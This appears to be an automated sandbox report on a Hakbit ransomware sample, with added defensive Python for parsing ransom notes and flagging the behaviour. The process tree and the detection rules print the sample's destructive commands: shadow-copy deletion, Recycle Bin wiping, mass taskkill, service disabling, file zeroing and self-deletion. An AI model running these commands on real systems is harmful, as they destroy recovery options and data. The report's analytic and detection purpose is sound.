Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64 arch:x86 image:win7-20241023-en locale:en-us os:windows7-x64 system
  • submitted
    23/01/2025, 02:37 UTC

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

  • Size

    80KB

  • MD5

    8152a3d0d76f7e968597f4f834fdfa9d

  • SHA1

    c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e

  • SHA256

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

  • SHA512

    eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

  • SSDEEP

    1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below potentialenergy@mail.ru Key Identifier: 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 Number of files that were processed is: 468
Emails

potentialenergy@mail.ru
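The extracted configuration above (note text, contact address) and the `<original name>.energy[<email>]` naming scheme visible in the dropped files further down can be pulled out mechanically. The following Python helper is an added example, not the sandbox's own extractor; its regular expressions are assumptions derived from the note text and file names in this report, the sample inputs are constructed from the same report, and the key identifier is a placeholder because the real value is not reproduced on the page.

```python
"""Extract triage fields from a Hakbit-style ransom note and renamed-file paths.

Added example (not the sandbox's extractor).  The regular expressions are
assumptions derived from the note text and dropped-file names in the report;
SAMPLE_PATHS / SAMPLE_NOTE are constructed from the report, with a placeholder
key identifier because the real one is not reproduced on the page.
"""
import re
from collections import Counter

# "<original name>.<marker>[<contact email>]" as seen in the dropped files.
RENAMED_RE = re.compile(
    r'^(?P<original>.+?)\.(?P<marker>[A-Za-z0-9_-]+)\[(?P<email>[^\]\s]+@[^\]\s]+)\]$')
NOTE_EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
NOTE_KEY_RE = re.compile(r'Key Identifier:\s*(\S+)', re.I)
NOTE_COUNT_RE = re.compile(r'Number of files that were processed is:\s*(\d+)', re.I)


def parse_renamed_path(path):
    """Split a renamed file path into directory, original name, marker and email.

    Returns None when the name does not follow the scheme (e.g. the note itself
    or an unrelated artefact such as a jump-list file).
    """
    directory, _, name = path.rpartition("\\")
    m = RENAMED_RE.match(name)
    if not m:
        return None
    return {"directory": directory, **m.groupdict()}


def parse_ransom_note(text):
    """Pull the contact address(es), key identifier and claimed file count from the note."""
    key = NOTE_KEY_RE.search(text)
    count = NOTE_COUNT_RE.search(text)
    return {
        "emails": sorted(set(NOTE_EMAIL_RE.findall(text))),
        "key_identifier": key.group(1) if key else None,
        "files_processed": int(count.group(1)) if count else None,
    }


def summarize(paths, note_text):
    """Cross-check the note against the renamed files: one marker, one contact email."""
    renamed = [r for r in map(parse_renamed_path, paths) if r]
    note = parse_ransom_note(note_text)
    markers = Counter(r["marker"] for r in renamed)
    emails_in_names = {r["email"] for r in renamed}
    return {
        "renamed_files": len(renamed),
        "markers": dict(markers),
        # the email embedded in file names should be one the note also advertises
        "email_consistent": emails_in_names <= set(note["emails"]),
        "originals": [r["original"] for r in renamed],
        **note,
    }


# Constructed inputs taken from the report's dropped-file list and ransom note.
SAMPLE_PATHS = [
    r"C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck.energy[potentialenergy@mail.ru]",
    r"C:\Users\Admin\Desktop\OpenBackup.xlsx.energy[potentialenergy@mail.ru]",
    r"C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms",
]
SAMPLE_NOTE = ("To recover your data contact the email below potentialenergy@mail.ru "
               "Key Identifier: PLACEHOLDER-KEY-ID "  # placeholder, not the real identifier
               "Number of files that were processed is: 468")

if __name__ == "__main__":
    for k, v in summarize(SAMPLE_PATHS, SAMPLE_NOTE).items():
        print(f"{k}: {v}")
```

The `email_consistent` flag is the useful cross-check: the address baked into every renamed file must match the one in the note, otherwise either the note was tampered with or two different campaigns touched the host. `originals` gives the list of file names to restore from backup once the marker suffix is stripped.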

Signatures

  • Disables service(s) 3 TTPs
  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Hakbit family
  • Renames multiple (53) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 47 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      2⤵
        PID:2592
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLTELEMETRY start= disabled
        2⤵
        • Launches sc.exe
        PID:1236
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
        2⤵
        • Launches sc.exe
        PID:2560
      • C:\Windows\system32\sc.exe
        "sc.exe" config SQLWriter start= disabled
        2⤵
        • Launches sc.exe
        PID:796
      • C:\Windows\system32\sc.exe
        "sc.exe" config SstpSvc start= disabled
        2⤵
        • Launches sc.exe
        PID:2364
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2352
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqbcoreservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM firefoxconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM agntsvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2464
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM thebat.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM steam.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM encsvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM excel.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2864
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM CNTAoSMgr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlwriter.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2860
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM tbirdconfig.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM dbeng50.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM thebat64.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2480
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocomm.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1752
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM infopath.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mbamtray.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2284
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM zoolz.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" IM thunderbird.exe /F
        2⤵
        • Kills process with taskkill
        PID:2688
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM dbsnmp.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM xfssvccon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2772
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM Ntrtscan.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM isqlplussvc.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM onenote.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM PccNTMon.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM msaccess.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM outlook.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1732
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM tmlisten.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2152
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM msftesql.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM powerpnt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1464
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM visio.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1284
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM winword.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld-nt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM wordpad.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM mysqld-opt.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocautoupds.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM ocssd.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM oracle.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:840
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlagent.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlbrowser.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM sqlservr.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1560
      • C:\Windows\system32\taskkill.exe
        "taskkill.exe" /IM synctime.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1172
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2664
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        PID:844
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.7 -n 3
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2248
        • C:\Windows\system32\fsutil.exe
          fsutil file setZeroData offset=0 length=524288 “%s”
          3⤵
            PID:3216
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
          2⤵
          • Deletes itself
          PID:2960
          • C:\Windows\system32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:1636
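The process tree above is the detection-relevant part of this report: the sample never does the damage itself but shells out to `sc.exe` (service disable), a burst of `taskkill /F` calls, PowerShell WMI shadow-copy deletion, `rd /s /q` on `$Recycle.bin`, and two delayed self-deletion chains (`ping 127.0.0.7 -n 3` plus `fsutil setZeroData` plus `Del`, and `choice /T 3` plus `Del`). The Python triage routine below is an added example, not the sandbox's own signature engine; its rules and thresholds are assumptions written from those command lines, and the event list is constructed from the tree (pids and ppids as reported, the sample renamed to `sample.exe`, an unreported grandparent pid set to 1500, and straight quotes in place of the captured smart quotes). The PowerShell command is kept as captured, including its `$_Delete()` form.

```python
"""Behavioural triage of a sandbox process tree for ransomware-style impact.

Added example, not the sandbox's own signature engine.  RULES and the
thresholds are assumptions written from the command lines in the report;
SAMPLE_EVENTS is constructed from that process tree (sample renamed to
sample.exe, grandparent pid 1500 invented, smart quotes replaced).
"""
import re
from collections import defaultdict

# tag -> regex over the full command line; every pattern is an assumption
RULES = {
    "service_disable": re.compile(r'\bsc(?:\.exe)?"?\s+config\s+\S+\s+start=\s*disabled', re.I),
    "force_kill": re.compile(r'\btaskkill(?:\.exe)?"?\s+.*?/F\b', re.I),
    "shadow_copy_delete": re.compile(
        r'Win32_Shadowcopy.*Delete|vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete', re.I),
    "recycle_bin_wipe": re.compile(r'\brd\s+/s\s+/q\s+\S*\$Recycle\.bin', re.I),
    "file_zeroing": re.compile(r'\bfsutil\s+file\s+setZeroData\b', re.I),
    # a timer (choice /T or ping -n) followed by del in the same command line
    "delayed_self_delete": re.compile(
        r'(?:choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+|ping\s+127\.0\.0\.\d+\s+-n\s+\d+).*\bdel\b', re.I),
    "ransom_note_display": re.compile(
        r'notepad(?:\.exe)?"?\s+.*(?:HOW_TO|DECRYPT|DECYPHER|RECOVER|README)', re.I),
}


def classify_command(cmdline):
    """Return the set of behaviour tags whose rule matches this command line."""
    return {tag for tag, rx in RULES.items() if rx.search(cmdline)}


def triage_process_tree(events, min_distinct_tags=3, kill_burst=10):
    """Roll child behaviours up to the top-most parent present in the events.

    A root is flagged ransomware_like when it inhibits recovery (shadow copies
    or the recycle bin) and shows at least min_distinct_tags distinct impact
    behaviours, or when it force-kills kill_burst or more processes.
    """
    by_pid = {e["pid"]: e for e in events}

    def root_of(pid):
        while by_pid[pid]["ppid"] in by_pid:
            pid = by_pid[pid]["ppid"]
        return pid

    tags_by_root, kills_by_root = defaultdict(set), defaultdict(int)
    for e in events:
        tags = classify_command(e["cmdline"])
        root = root_of(e["pid"])
        tags_by_root[root] |= tags
        if "force_kill" in tags:
            kills_by_root[root] += 1

    verdicts = {}
    for root, tags in tags_by_root.items():
        recovery_inhibited = bool(tags & {"shadow_copy_delete", "recycle_bin_wipe"})
        verdicts[root] = {
            "root_cmdline": by_pid[root]["cmdline"],
            "tags": sorted(tags),
            "force_kills": kills_by_root[root],
            "ransomware_like": (recovery_inhibited and len(tags) >= min_distinct_tags)
            or kills_by_root[root] >= kill_burst,
        }
    return verdicts


# Constructed event list built from the process tree in the report.
SAMPLE_EVENTS = [
    {"pid": 2124, "ppid": 1500, "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\sample.exe"'},
    {"pid": 2592, "ppid": 2124, "cmdline": r'"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin'},
    {"pid": 1236, "ppid": 2124, "cmdline": r'"sc.exe" config SQLTELEMETRY start= disabled'},
    {"pid": 796, "ppid": 2124, "cmdline": r'"sc.exe" config SQLWriter start= disabled'},
    {"pid": 2568, "ppid": 2124, "cmdline": r'"taskkill.exe" /IM mspub.exe /F'},
    {"pid": 2352, "ppid": 2124, "cmdline": r'"taskkill.exe" /IM mysqld.exe /F'},
    {"pid": 2688, "ppid": 2124, "cmdline": r'"taskkill.exe" IM thunderbird.exe /F'},
    {"pid": 1560, "ppid": 2124, "cmdline": r'"taskkill.exe" /IM sqlservr.exe /F'},
    {"pid": 1072, "ppid": 2124, "cmdline": r'"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }'},
    {"pid": 2664, "ppid": 2124, "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt'},
    {"pid": 844, "ppid": 2124, "cmdline": r'"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"'},
    {"pid": 2248, "ppid": 844, "cmdline": r'ping 127.0.0.7 -n 3'},
    {"pid": 3216, "ppid": 844, "cmdline": r'fsutil file setZeroData offset=0 length=524288 "%s"'},
    {"pid": 2960, "ppid": 2124, "cmdline": r'"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe'},
    {"pid": 1636, "ppid": 2960, "cmdline": r'choice /C Y /N /D Y /T 3'},
    # benign control process outside the sample's tree (constructed)
    {"pid": 3000, "ppid": 1500, "cmdline": r'"C:\Windows\system32\svchost.exe" -k netsvcs'},
]

if __name__ == "__main__":
    for root, v in triage_process_tree(SAMPLE_EVENTS).items():
        print(root, v["ransomware_like"], v["force_kills"], v["tags"])
```

Two design points matter for a real deployment. First, the rules key on the parent-level `cmd.exe` lines, not only on the `ping.exe` / `choice.exe` / `fsutil.exe` children: each child alone (`ping 127.0.0.7 -n 3`, `choice /C Y /N /D Y /T 3`) is benign, and it is the combination with `Del` in the parent's command line that marks the self-deletion chain. Second, the verdict is per root rather than per event, which is what turns forty-seven individually unremarkable `taskkill` invocations into one finding; note the report's `taskkill.exe IM thunderbird.exe /F` line (missing slash) is still counted, since `/F` alone is the discriminating token.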

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck.energy[potentialenergy@mail.ru]

          Filesize

          4KB

          MD5

          389e4c07e4fe5e3b9cff23f1c40d79e8

          SHA1

          ab0e7cf9f799f7cbf6986aa7d8520d7ea95c68e8

          SHA256

          a1e8d5c078cd08305e140d78b6b9f0868fa9b1ff219ffd914f8ef680963bf8f6

          SHA512

          fa8eca41c70679814c1b6fa9501f53863b1d8b3f7a3b8c647a90406a87a52a42f925ffe68e8bd455e70bc52a7fe1f0640467c562a3a0913a39fa0df7c835aff5

        • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[potentialenergy@mail.ru]

          Filesize

          180KB

          MD5

          effa57af7b66fa8ad077ece4924244e1

          SHA1

          6cd9dd92eb0249d18d11c64bf216c2c3edf7b542

          SHA256

          4327d8bf4d96705c57582eda5a50657a6627b53718e586c7764d3409bb1975f0

          SHA512

          8a60d55c5b29cd22c57db539be4b4a981c6d6b56aa1412f88113c42118223a9d730acdcfadcab529d3fb2213ff0c40ada6e3fc676b934f86fc42ab17717315b7

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          67ff76385e2e15edbe06b2dc421b391a

          SHA1

          de1dd541e77a58df23603412681eda05e5cec9f3

          SHA256

          f225cab4cfc06724a3cbe9761c85ebce12659b92af8dd0b53c6494ef87ae6b05

          SHA512

          576271f8e901ae3ffe819d7bfc10522f195df8e14a9edc7c68293fd8282c446839405a33a371f00ad3c8cb27f8fb515a4cef41f4b03c1dd8aaa080829a5e2a6c

        • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

          Filesize

          828B

          MD5

          084d35f9c4e972ede81a28c700f13112

          SHA1

          dccdc35479ad6c2fc96ee184866e6088d57915c5

          SHA256

          230699358af8fa506abd672d55f9c89de27bfab0adb371738fb345a24b336a6b

          SHA512

          bae536710ff25391715ad4ecb660f999bab3f4d9adb5d44548908d918394b60cf352891e68b2f7c029771c7690bcd418d72b4e47bbea94336c7c0ec68640325f

        • C:\Users\Admin\Desktop\OpenBackup.xlsx.energy[potentialenergy@mail.ru]

          Filesize

          16KB

          MD5

          9da97f78624798f4fa31f2909daf4d93

          SHA1

          889a0e0f1252a86e689d21590dcfc5f4bce65c13

          SHA256

          a59e417ddea17a506a6499ab5c83da97c7056e9b5aeb5f709e51c915b71106d2

          SHA512

          74db5a5b4cdb8fe92970c71f2dd1a11524241883ece126e5d63a05b5c88c055b03920b0b5e1ab4a9e69a0fe0951c3a5cea0b8b641a9915ba1c6b17bcb90b6f8c

        • memory/1072-8-0x000000001B580000-0x000000001B862000-memory.dmp

          Filesize

          2.9MB

        • memory/1072-9-0x0000000002990000-0x0000000002998000-memory.dmp

          Filesize

          32KB

        • memory/2124-278-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

          Filesize

          4KB

        • memory/2124-0-0x000007FEF67F3000-0x000007FEF67F4000-memory.dmp

          Filesize

          4KB

        • memory/2124-311-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

        • memory/2124-3-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB

        • memory/2124-1-0x0000000000D70000-0x0000000000D8A000-memory.dmp

          Filesize

          104KB

        • memory/2124-575-0x000007FEF67F0000-0x000007FEF71DC000-memory.dmp

          Filesize

          9.9MB
